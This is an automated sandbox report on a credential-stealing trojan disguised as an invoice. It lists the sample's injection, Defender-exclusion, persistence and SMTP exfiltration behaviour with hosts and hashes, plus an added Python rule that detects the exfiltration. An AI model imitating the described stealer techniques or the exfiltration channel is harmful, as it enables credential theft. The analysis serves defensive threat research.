Source: Yara match | File source: 9.2.pUAQmWA.exe.36d1c88.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.pUAQmWA.exe.370d0a8.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TT Invoice copy.exe.3a10cc0.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.pUAQmWA.exe.370d0a8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.pUAQmWA.exe.36d1c88.12.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TT Invoice copy.exe.3a4c0e0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2889363476.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2888895822.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2888895822.0000000003327000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2888895822.000000000334B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2889363476.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2889363476.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1721632586.00000000036D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: TT Invoice copy.exe PID: 6716, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: TT Invoice copy.exe PID: 7508, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: pUAQmWA.exe PID: 7612, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: pUAQmWA.exe PID: 7896, type: MEMORYSTR
Source: Yara match | File source: TT Invoice copy.exe, type: SAMPLE
Source: Yara match | File source: 0.0.TT Invoice copy.exe.330000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1633307056.0000000000332000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Roaming\pUAQmWA.exe, type: DROPPED
MITRE ATT&CK Matrix (per tactic; the number in brackets is the match-count badge the report shows next to a technique, kept as rendered; techniques without a badge are listed in the column but were not matched)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation [131]; Scheduled Task/Job [1]; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading [1]; Scheduled Task/Job [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: DLL Side-Loading [1]; Process Injection [111]; Scheduled Task/Job [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Disable or Modify Tools [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [22]; DLL Side-Loading [1]; Masquerading [1]; Virtualization/Sandbox Evasion [151]; Process Injection [111]
Credential Access: OS Credential Dumping [1]; Input Capture [1]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: File and Directory Discovery [1]; System Information Discovery [24]; Query Registry [1]; Security Software Discovery [531]; Process Discovery [1]; Virtualization/Sandbox Evasion [151]; Application Window Discovery [1]; System Network Configuration Discovery [1]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data [11]; Data from Local System [1]; Email Collection [1]; Input Capture [1]; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [1]; Non-Standard Port [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [12]; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
Behavior Graph ID: 1426712 | Sample: TT Invoice copy.exe | Start date: 16/04/2024 | Architecture: WINDOWS | Score: 100

Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 18 other signatures
DNS/IP info: us2.smtp.mailhostbox.com; ip-api.com

Process tree (bracketed numbers are the created-file / registry-value badges from the graph, kept as rendered):

TT Invoice copy.exe [7] (started)
  dropped: C:\Users\user\AppData\Roaming\pUAQmWA.exe, PE32
  dropped: C:\Users\user\AppData\Local\...\tmp3165.tmp, XML
  signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
  -> powershell.exe [23] (started); signature: Loading BitLocker PowerShell Module
       -> conhost.exe (started)
       -> WmiPrvSE.exe (started)
  -> TT Invoice copy.exe [15 2] (started)
       -> ip-api.com 208.95.112.1, source ports 49733, 49737 -> 80, TUT-ASUS, United States
       -> us2.smtp.mailhostbox.com 208.91.198.143, source ports 49734, 49738 -> 587, PUBLIC-DOMAIN-REGISTRYUS, United States
  -> powershell.exe [23] (started)
       -> conhost.exe (started)
  -> schtasks.exe [1] (started)
       -> conhost.exe (started)
            -> conhost.exe (started)
pUAQmWA.exe [5] (started)
  signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file
  -> pUAQmWA.exe (started); signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
  -> schtasks.exe (started)
       -> conhost.exe (started)
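The graph shows the injected TT Invoice copy.exe reaching ip-api.com on port 80 (the "Check if machine is in data center or colocation facility" signature; the URL list below records http://ip-api.com/line/?fields=hosting) and then us2.smtp.mailhostbox.com on port 587. As an added example that is not part of the report, the Python below correlates those two destinations per process from network events and emits the destinations to block. The events are constructed from the graph (hosts, IPs and ports are the report's; ordering them by ephemeral source port is an assumption) plus one invented benign mail-client row as a control; the function names and the event window are assumptions.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple


@dataclass(frozen=True)
class NetEvent:
    seq: int                  # ordering key; constructed, the graph carries no timestamps
    process: str
    src_port: int
    dst_host: str
    dst_ip: str
    dst_port: int
    url: Optional[str] = None


# Constructed from the behaviour graph: the injected TT Invoice copy.exe reached
# ip-api.com:80 from source ports 49733/49737 and us2.smtp.mailhostbox.com:587 from
# 49734/49738. Ordering by source port is an assumption; the thunderbird.exe row is an
# invented benign control and is not from the report.
SAMPLE_EVENTS: List[NetEvent] = [
    NetEvent(1, "TT Invoice copy.exe", 49733, "ip-api.com", "208.95.112.1", 80,
             "http://ip-api.com/line/?fields=hosting"),
    NetEvent(2, "TT Invoice copy.exe", 49734, "us2.smtp.mailhostbox.com", "208.91.198.143", 587),
    NetEvent(3, "TT Invoice copy.exe", 49737, "ip-api.com", "208.95.112.1", 80,
             "http://ip-api.com/line/?fields=hosting"),
    NetEvent(4, "TT Invoice copy.exe", 49738, "us2.smtp.mailhostbox.com", "208.91.198.143", 587),
    NetEvent(5, "thunderbird.exe", 50001, "smtp.example.net", "192.0.2.10", 587),
]

GEO_CHECK_HOSTS = {"ip-api.com"}     # public geolocation API used for the hosting/VM check
SMTP_PORTS = {25, 465, 587}          # SMTP and submission ports


def is_hosting_check(e: NetEvent) -> bool:
    """True for the ip-api.com 'fields=hosting' request recorded in the report."""
    return e.dst_host in GEO_CHECK_HOSTS and bool(e.url) and "fields=hosting" in e.url


def smtp_exfil_candidates(events: List[NetEvent], window: int = 10) -> List[Tuple[str, int, int, str, int]]:
    """Per process, pair each hosting check with the next SMTP connection within `window` events.

    Returns (process, check_seq, smtp_seq, smtp_host, smtp_port) tuples.
    """
    by_proc: Dict[str, List[NetEvent]] = {}
    for e in sorted(events, key=lambda ev: ev.seq):
        by_proc.setdefault(e.process, []).append(e)
    hits: List[Tuple[str, int, int, str, int]] = []
    for proc, evs in by_proc.items():
        for i, e in enumerate(evs):
            if not is_hosting_check(e):
                continue
            for f in evs[i + 1:i + 1 + window]:
                if f.dst_port in SMTP_PORTS:
                    hits.append((proc, e.seq, f.seq, f.dst_host, f.dst_port))
                    break
    return hits


def flagged_iocs(events: List[NetEvent]) -> List[Tuple[str, str, int]]:
    """Sorted (host, ip, port) triples contacted by every process the correlation flagged."""
    flagged: Set[str] = {h[0] for h in smtp_exfil_candidates(events)}
    return sorted({(e.dst_host, e.dst_ip, e.dst_port) for e in events if e.process in flagged})


if __name__ == "__main__":
    for proc, check, smtp, host, port in smtp_exfil_candidates(SAMPLE_EVENTS):
        print(f"{proc}: hosting check (#{check}) followed by SMTP to {host}:{port} (#{smtp})")
    for ioc in flagged_iocs(SAMPLE_EVENTS):
        print("block:", ioc)
```

ip-api.com is a legitimate public service and outbound port 587 is normal for mail clients, so neither event is a signal on its own; the pairing of a hosting check with an SMTP submission from the same non-mail process is what the rule keys on, which is why the control row does not fire.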

Source | Detection | Scanner | Label
TT Invoice copy.exe | 47% | ReversingLabs | ByteCode-MSIL.Backdoor.Bladabhindi
TT Invoice copy.exe | 51% | Virustotal |
TT Invoice copy.exe | 100% | Avira | TR/AD.GenSteal.iagga
TT Invoice copy.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\pUAQmWA.exe | 100% | Avira | TR/AD.GenSteal.iagga
C:\Users\user\AppData\Roaming\pUAQmWA.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\pUAQmWA.exe | 47% | ReversingLabs | ByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Roaming\pUAQmWA.exe | 51% | Virustotal |

No Antivirus matches

No Antivirus matches
Source | Detection | Scanner | Label
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# | 0% | URL Reputation | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://ocsp.sectigo.com0A | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | Virustotal |
http://www.founder.com.cn/cn/cThe | 0% | Virustotal |
http://www.zhongyicts.com.cn | 1% | Virustotal |
http://www.founder.com.cn/cn/bThe | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
us2.smtp.mailhostbox.com | 208.91.198.143 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://ip-api.com/line/?fields=hosting | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# | TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E9F000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2898221371.0000000006524000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.000000000332F000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001406000.00000004.00000020.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001432000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersG | TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://sectigo.com/CPS0 | TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E9F000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2898221371.0000000006524000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.000000000332F000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001406000.00000004.00000020.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001432000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/? | TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://account.dyn.com/ | TT Invoice copy.exe, 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 00000009.00000002.1721632586.00000000036D1000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://us2.smtp.mailhostbox.com | TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.0000000003327000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers? | TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.tiro.com | TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com/line/?fields=hostingi | TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E08000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                http://www.sajatypeworks.comTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.typography.netDTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers/cabarga.htmlNTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.founder.com.cn/cn/cTheTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                  http://www.galapagosdesign.com/staff/dennis.htmTT Invoice copy.exe, 00000000.00000002.1685058068.0000000005830000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.founder.com.cn/cnTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                  http://www.fontbureau.com/designers/frere-user.htmlTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.jiyu-kobo.co.jp/TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://ip-api.comTT Invoice copy.exe, 00000008.00000002.2889363476.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.galapagosdesign.com/DPleaseTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers8TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://ocsp.sectigo.com0ATT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E9F000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2898221371.0000000006524000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.000000000332F000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001406000.00000004.00000020.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001432000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fonts.comTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.sandoll.co.krTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.urwpp.deDPleaseTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.zhongyicts.com.cnTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTT Invoice copy.exe, 00000000.00000002.1681301766.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 00000009.00000002.1714095996.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.sakkal.comTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
IP              | Domain                    | Country       | ASN    | ASN Name                 | Malicious
208.91.198.143  | us2.smtp.mailhostbox.com  | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
208.95.112.1    | ip-api.com                | United States | 53334  | TUT-ASUS                 | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1426712
Start date and time: 2024-04-16 14:10:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: TT Invoice copy.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@20/15@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 154
• Number of non-executed functions: 9
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time      | Type             | Description
13:10:57  | Task Scheduler   | Run new task: pUAQmWA path: C:\Users\user\AppData\Roaming\pUAQmWA.exe
14:10:56  | API Interceptor  | 26x Sleep call for process: TT Invoice copy.exe modified
14:10:57  | API Interceptor  | 26x Sleep call for process: powershell.exe modified
14:10:59  | API Interceptor  | 23x Sleep call for process: pUAQmWA.exe modified
Process: C:\Users\user\Desktop\TT Invoice copy.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Reputation: high, very likely benign file
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Users\user\AppData\Roaming\pUAQmWA.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):2232
                                                                                Entropy (8bit):5.380805901110357
                                                                                Encrypted:false
                                                                                SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//8PUyus:lGLHyIFKL3IZ2KRH9Oug8s
                                                                                MD5:F9B7CF60C22DBE6B73266580FFD54629
                                                                                SHA1:05ED734C0A5EF2ECD025D4E39321ECDC96612623
                                                                                SHA-256:880A3240A482AB826198F84F548F4CB5B906E4A2D7399D19E3EF60916B8D2D89
                                                                                SHA-512:F55EFB17C1A45D594D165B9DC4FA2D1364B38AA2B0D1B3BAAE6E1E14B8F3BD77E3A28B7D89FA7F6BF3EEF3652434228B1A42BF9851F2CFBB6A7DCC0254AAAE38
                                                                                Malicious:false
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Users\user\Desktop\TT Invoice copy.exe
                                                                                File Type:XML 1.0 document, ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):1573
                                                                                Entropy (8bit):5.111302380792291
                                                                                Encrypted:false
                                                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtag8xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTB8v
                                                                                MD5:EC61904CC9DF3668924458C492EBC250
                                                                                SHA1:52F11617BF9BFD3F4FEC7D79F52DD18E2F3821FD
                                                                                SHA-256:CBBEDB375EFA910716421361E3AF4AA3371299A70B5F6028B2D3C774C3D715C7
